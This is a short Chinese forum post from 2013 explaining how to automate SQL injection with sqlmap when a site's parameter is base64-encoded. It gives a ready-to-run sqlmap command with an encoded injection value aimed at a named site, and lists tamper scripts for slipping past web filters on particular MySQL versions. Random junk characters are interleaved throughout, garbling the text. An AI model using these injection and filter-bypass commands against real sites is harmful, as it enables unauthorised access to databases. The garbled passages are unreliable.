WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?% M5 e' R8 @' Y5 f
: m d, b$ o3 s: r) ^9 usqlmap的tamper里有个base64encode.py
8 M) Z# }$ }% S% A/ A+ ?; G- g$ `! h5 ~
使用如下
) i4 B! m, b, l
& u( J' Z" x1 G/ D! }- _/ D7 @sqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs
* w/ V- g- N2 p4 z6 @ Y8 x0 I: W8 T) C& s% z
& H; j+ J$ ~( u0 a; T, r) jsqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”
) Z* H( T4 Z+ Y! q" M$ a. V, m& l- U( G4 K L: _9 l
其中常用到的bypass脚本绕过SQLMAP主要两个脚本:2 }& d, l w; g n+ h
% L9 J! H8 n, Q8 S. h% h% c5 E, h- ?space2hash.py ,对于MYSQL数据库 4.0, 5.0注入
' r, \- z! v: H0 f1 [1 I8 C# Y3 mspace2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入# L7 J3 H7 @# C
首先确定目标数据库版本,然后选择相应的脚本。
" ]3 @( L: K- ~# G1 g" r# x-v 3 --batch --tamper "space2hash.py"
! |! l+ \0 ?' V/ H/ K4 Q) \. P
1 i" ]5 E. d8 G. S. l' n还有其他一些插件:4 i* ^" P# X4 M: h& ?" A7 A
encodes编码 ——charencode.py4 d# A1 c7 f1 Y* Y( `
base64编码 —— base64encode.py* ~; G' x% @! j: X" Y7 B& ~1 w
替换空格和关键字 —— halfversionedmorekeywords.py# q4 c# P, A- } K1 c
|
5 G+ X0 g# a; ~# b9 b4 a( X) U+ k1 Y3 K5 f. m7 M8 p
k5 d% w; W' n ]5 D; s' k9 g% r5 H0 Q( U8 C$ d# F
|
发表于 2013-11-23 15:50:45
收藏
支持
反对